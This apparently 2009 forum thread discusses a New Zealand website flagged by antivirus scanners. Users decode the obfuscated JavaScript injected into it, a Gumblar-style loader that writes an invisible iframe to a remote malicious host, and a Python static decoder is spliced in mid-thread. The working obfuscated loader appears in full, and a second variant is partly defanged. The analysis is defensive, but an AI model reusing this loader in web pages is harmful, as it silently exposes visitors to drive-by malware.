View Full Version : Virus on web-page??



notechyet
08-06-2009, 01:16 PM
Hello
I just wanted to check out an engineer and when I went to www. t f e l .co.nz/ web-site my Avast warned me of a Trojan horse virus being present.
Would someone be able to verify this for me?
Thanks

Rob99
08-06-2009, 01:32 PM
Clicked on your link, NOD32 also blocked it.

8/06/2009 1:31:06 p.m. HTTP filter file www. t f e l .co.nz JS/Kryptik.F virus connection terminated - quarantined ROB-NB\Rob Threat was detected upon access to web by the application: C:\Program Files\Mozilla Firefox\firefox.exe.

notechyet
08-06-2009, 01:41 PM
Hi Rob
Thanks for testing!
I'll contact the owner of the web-page as I sort of know them.

wainuitech
08-06-2009, 03:27 PM
Just a bit more Info -- Information On Infections (http://www.imagef1.net.nz/files/Web_Page.jpg) -- bottom right the name of the infection.

Speedy Gonzales
08-06-2009, 03:41 PM
Hmm, according to google that's what the torrent version of the Windows 7 beta had in it too. JS probably means it runs in / as part of javascript?

pctek
08-06-2009, 03:42 PM
Nice to know Avast also identified it, NOD sure does.

plod
08-06-2009, 03:55 PM
Safari blocked it

Erayd
08-06-2009, 04:48 PM
The offending code is this:
<script type="text/javascript">var hdOruVsHnKBXZuvtsRmw = "z60z105z102z114z97z109z101z32z119z105z100z116z104z 61z34z52z56z48z34z32z104z101z105z103z104z116z61z34 z54z48z34z32z115z114z99z61z34z104z116z116z112z58z4 7z47z114z110z119z46z107z122z47z105z110z100z101z120 z46z112z104z112z34z32z115z116z121z108z101z61z34z98 z111z114z100z101z114z58z48z112z120z59z32z112z111z1 15z105z116z105z111z110z58z114z101z108z97z116z105z1 18z101z59z32z116z111z112z58z48z112z120z59z32z108z1 01z102z116z58z45z53z48z48z112z120z59z32z111z112z97 z99z105z116z121z58z48z59z32z102z105z108z116z101z11 4z58z112z114z111z103z105z100z58z68z88z73z109z97z10 3z101z84z114z97z110z115z102z111z114z109z46z77z105z 99z114z111z115z111z102z116z46z65z108z112z104z97z40 z111z112z97z99z105z116z121z61z48z41z59z32z45z109z1 11z122z45z111z112z97z99z105z116z121z58z48z34z62z60 z47z105z102z114z97z109z101z62";var kWiFaYwHrXtZBIQvdJDR = hdOruVsHnKBXZuvtsRmw.split("z");var TEptzkmsBZolwWqWunem = "";for (var KYLMhcILlLcFQRyPBlHD=1; KYLMhcILlLcFQRyPBlHD<kWiFaYwHrXtZBIQvdJDR.length; KYLMhcILlLcFQRyPBlHD++){TEptzkmsBZolwWqWunem+=Stri ng.fromCharCode(kWiFaYwHrXtZBIQvdJDR[KYLMhcILlLcFQRyPBlHD]);}document.write(TEptzkmsBZolwWqWunem)</script>
What it does is embed an invisible iframe in the page that points to [edited], resulting in that page loading without the user being aware of it. That page is probably the one containing the virus.

Edit: For those interested in the unscrambled version of the above javascript, here it is (newlines & indentation added by me):

<iframe
width="480"
height="60"
src="http://rnw.kz/index.php"
style="
border:0px;
position:relative;
top:0px;
left:-500px;
opacity:0;
filter:progid:DXImageTransform.Microsoft.Alpha(opa city=0);
-moz-opacity:0
"
>
</iframe>
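The decoding Erayd did by hand (and that MontrealPaul asks about further down the thread) can be done statically, without ever running the script in a browser: the loader only stores the markup as a list of character codes behind a throwaway separator, so a small script can pull the string literal out of the page, re-do the split()/fromCharCode mapping itself, and report which iframe targets the hidden markup would load. The following is an added example written for this thread, not code posted by anyone in it; the sample page it analyses is constructed inline and the payload points at the placeholder host example.invalid rather than any real site.

```python
import re

# Patterns for the two statements the loader relies on: a quoted string assigned to a
# variable, and a later .split("SEP") call on that same variable.
STRING_ASSIGN = re.compile(r'var\s+(\w+)\s*=\s*"([^"]*)"')
SPLIT_CALL = re.compile(r'(\w+)\.split\("([^"]+)"\)')
SCRIPT_BODY = re.compile(r'<script[^>]*>(.*?)</script>', re.DOTALL | re.IGNORECASE)
IFRAME_SRC = re.compile(r'<iframe[^>]*\bsrc="([^"]+)"', re.IGNORECASE)


def obfuscate(payload, sep, var):
    """Produce a script in the same shape as the loader seen in the thread.
    Used here only to construct sample input for the decoder below."""
    encoded = "".join(f"{sep}{ord(c)}" for c in payload)
    return (f'<script type="text/javascript">var {var} = "{encoded}";'
            f'var parts = {var}.split("{sep}");var out = "";'
            f'for (var i=1; i<parts.length; i++){{out+=String.fromCharCode(parts[i]);}}'
            f'document.write(out)</script>')


def decode_charcode_scripts(page):
    """Statically recover every string that a split()/String.fromCharCode loop in the
    page would build. Nothing is executed: only the integer-to-character mapping is redone."""
    decoded = []
    for script in SCRIPT_BODY.findall(page):
        if "String.fromCharCode" not in script:
            continue  # not this obfuscation family; ignore
        strings = dict(STRING_ASSIGN.findall(script))
        for var, sep in SPLIT_CALL.findall(script):
            blob = strings.get(var)
            if blob is None:
                continue
            # Forum software and copy/paste tend to wrap long literals with stray spaces,
            # so whitespace inside the blob is discarded before splitting.
            tokens = [t for t in re.sub(r"\s+", "", blob).split(sep) if t]
            if tokens and all(t.isdigit() for t in tokens):
                decoded.append("".join(chr(int(t)) for t in tokens))
    return decoded


def defang(markup):
    """Same trick MontrealPaul used: swap angle brackets for square brackets so the
    recovered markup can be pasted into a post or report without being rendered."""
    return markup.replace("<", "[").replace(">", "]")


def iframe_targets(markup):
    """List the src attributes of any iframes in the recovered markup."""
    return IFRAME_SRC.findall(markup)


# Constructed sample: an otherwise harmless page carrying one loader of the same shape
# as the one in the thread, with a placeholder host instead of a real one.
PAYLOAD = ('<iframe width="480" height="60" src="http://example.invalid/index.php" '
           'style="position:relative; left:-500px; opacity:0"></iframe>')
SAMPLE_PAGE = ("<html><body><p>Welcome to our site</p>"
               + obfuscate(PAYLOAD, "z", "hdOruVsHnKBXZuvtsRmw")
               + "</body></html>")


def analyse(page=SAMPLE_PAGE):
    """Return, for each decoded script, the defanged markup and the iframe targets."""
    return [{"decoded": defang(m), "iframes": iframe_targets(m)}
            for m in decode_charcode_scripts(page)]


if __name__ == "__main__":
    for result in analyse():
        print(result["decoded"])
        print("would silently load:", result["iframes"])
```

Running it against a saved copy of a suspect page (open the file and pass its text to analyse()) gives the hidden markup in square-bracket form plus the list of URLs the invisible iframe would fetch, which is the information a site owner needs to clean the page and to tell their host or AV vendor what was injected, without visiting the target.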

Jen
08-06-2009, 05:07 PM
Um guys, can you please not post clickable links to websites that contain viruses?

I've broken the URLs up so they aren't clickable (from curious newbies), and edited out Erayd's link as it tried to load when I previewed his post - luckily avast caught it and stopped the page loading.

Erayd
08-06-2009, 05:25 PM
Oops.... good point, I didn't think of the implications there - just figured people would be interested in the dissection, rather than actually trying to click through to the nasties. Sorry!

notechyet
08-06-2009, 09:15 PM
Thanks a lot guys for all your replies(and testing) and an apology for the infected link. I just did not know how else to ask for advice on this problem.

Sweep
08-06-2009, 11:22 PM
Oops.... good point, I didn't think of the implications there - just figured people would be interested in the dissection, rather than actually trying to click through to the nasties. Sorry!

Interesting though, as my Avast stopped me getting to the site in question and mentioned an Iframe issue.

MontrealPaul
10-06-2009, 01:38 AM
Hi, Erayd,

May I ask how you decoded that JS?

I am having a very similar problem with my web page. One person has reported JS/Kryptik.F, and another reported HTML/Framer.BS (he uses AVG). I am told others have reported "viruses" as well, but no further details (thanks!)

I have a piece of code similar to the offending code you showed on my page, which is at http:// soccerpointeclaire [dot] com.
I am not pasting the actual code, and obfuscated the page address, for obvious reasons.

It appears that this is the only page giving problems... The main difference about this page is that it has a Flash logo at the top.

I myself have looked at this page with IE, Firefox and Chrome, with no error. I use Trend OfficeScan (corporate version of PC-Cillin).

That page, btw, has not changed in months. I know, of course, that it could have somehow been modified by a hacker, but I compared it to an older backup copy, and they are identical (I renamed the old one and uploaded the backup, just in case).

I have one possible theory that a new AV signature, shared by various AV developers (if they do that) may be producing false positives... Another is that somehow the Flash code downloaded from the Macromedia site may have become infected.

I guess that's all I have for now, but I welcome any and all questions, and will help in any way I can.

Salutations,
-Paul

MontrealPaul
10-06-2009, 02:13 AM
Quick update: It occurred to me to try simply removing that wonky code, which I did, using a plaintext editor, after making a backup of the original page.

Turns out this made no difference (to me) in how the page displays, which suggests that that code was unnecessary, and probably malicious. I use Dreamweaver, btw, which inserts all sorts of wonky code, so sometimes it's hard to tell what belongs and what does not.

For those who want to check it out, I have left the original "infected" page there, under the name of index_Virus.htm (note the capital V)


Salutations,
-Paul

MontrealPaul
10-06-2009, 08:15 AM
Latest:

Yep, it was a trojan/xxs/worm! I'm not 100% certain, but I suspect it might be gumblar. Here are two links that speak of it:

http://www.switched.com/2009/06/02/though-the-conficker-virus-was-bad-meet-gumblar/

http://blog.avast.com/2009/06/03/gumblarcn-summary/

Yes, I have changed the credentials for my website.

Anyone who looks at that "virus" page of mine (see previous posts) will see, after the first <header> tag, a long JavaScript.

What it does, in the end, is open an iframe, with opacity=0 (invisible), to a site in China.

I have broken it down, and commented it, for anyone interested.
I have also modified the code so that any n00b dumb enough to run it will have to try very hard to make it dangerous... (how'd I do, Jen? :))

It will probably be hard to read, in the constraints of this web page, so you may want to copy/paste it into your favourite code editor, where it will be nicely coloured for clarity.


<script type="text/javascript">

// The following assigns the very long string to VariableOne. (Note the repeating string "EOje")
var VariableOne = "EOje91EOje105EOje102EOje114EOje97EOje109EOje101EOj e32EOje119EOje105EOje100EOje116EOje104EOje61EOje34 EOje52EOje56EOje48EOje34EOje32EOje104EOje101EOje10 5EOje103EOje104EOje116EOje61EOje34EOje54EOje48EOje 34EOje32EOje115EOje114EOje99EOje61EOje34EOje104EOj e116EOje116EOje112EOje58EOje47EOje47EOje116EOje114 EOje97EOje102EOje102EOje105EOje99EOje45EOje114EOje 101EOje115EOje111EOje117EOje114EOje99EOje101EOje11 5EOje46EOje99EOje110EOje47EOje111EOje114EOje100EOj e101EOje114EOje47EOje105EOje110EOje46EOje99EOje103 EOje105EOje63EOje50EOje34EOje32EOje115EOje116EOje1 21EOje108EOje101EOje61EOje34EOje98EOje111EOje114EO je100EOje101EOje114EOje58EOje48EOje112EOje120EOje5 9EOje32EOje112EOje111EOje115EOje105EOje116EOje105E Oje111EOje110EOje58EOje114EOje101EOje108EOje97EOje 116EOje105EOje118EOje101EOje59EOje32EOje116EOje111 EOje112EOje58EOje48EOje112EOje120EOje59EOje32EOje1 08EOje101EOje102EOje116EOje58EOje45EOje53EOje48EOj e48EOje112EOje120EOje59EOje32EOje111EOje112EOje97E Oje99EOje105EOje116EOje121EOje58EOje48EOje59EOje32 EOje102EOje105EOje108EOje116EOje101EOje114EOje58EO je112EOje114EOje111EOje103EOje105EOje100EOje58EOje 68EOje88EOje73EOje109EOje97EOje103EOje101EOje84EOj e114EOje97EOje110EOje115EOje102EOje111EOje114EOje1 09EOje46EOje77EOje105EOje99EOje114EOje111EOje115EO je111EOje102EOje116EOje46EOje65EOje108EOje112EOje1 04EOje97EOje40EOje111EOje112EOje97EOje99EOje105EOj e116EOje121EOje61EOje48EOje41EOje59EOje32EOje45EOj e109EOje111EOje122EOje45EOje111EOje112EOje97EOje99 EOje105EOje116EOje121EOje58EOje48EOje34EOje93EOje9 1EOje47EOje105EOje102EOje114EOje97EOje109EOje101EO je93";
//To improve safety, I have replaced code 60 ("<") with 91 ("["), and 62 (">") with 93 ("]").

// This splits VariableOne into a comma-separated string, substituting "EOje" for a comma.
// The result is stored in VariableTwo.
var VariableTwo = VariableOne.split("EOje");
//I'm inserting a printout here of the code so far:
document.write(VariableTwo)
//See http://www.ascii.cl/htmlcodes.htm for a list of codes.

// Initialize and empty VariableThree
var VariableThree = "";

// The following For loop reads as follows:
//starting at 1,
for (var VariableFour=1;
//for each character in VariableTwo,
VariableFour<VariableTwo.length;
//incrementing by one each time
VariableFour++)
//do this:
//VariableThree is now what VariableThree was, plus the character in VariableTwo, at the position VariableFour is at.
{VariableThree+=String.fromCharCode(VariableTwo[VariableFour]);
}

//Not sure why this is necessary...
var VariableFive = ""+VariableThree+"";

//Now, deliver the load; DANGER: This is where it all happens!!
document.write(""+VariableFive+"")
//Again, not sure why it is necessary to border with more empty strings...


//Done.
document.write("-----------------------<BR>");
var var1="Done"
document.write(""+var1+"")

</script>

N.B.: In the original code, "VariableOne", "VariableTwo", etc. are also garbagey-looking names like hPLAmyvsdfELzjhpwQYf.

What this finally produces is something almost (because I "fixed" it) like the following:

Why did I go through all of the above, you may ask? Well, the main reason is that I was learning as I went, so I commented to keep track of where I am so far. Plus, it makes it easier to share afterwards! :nerd:

Cheers,
-Paul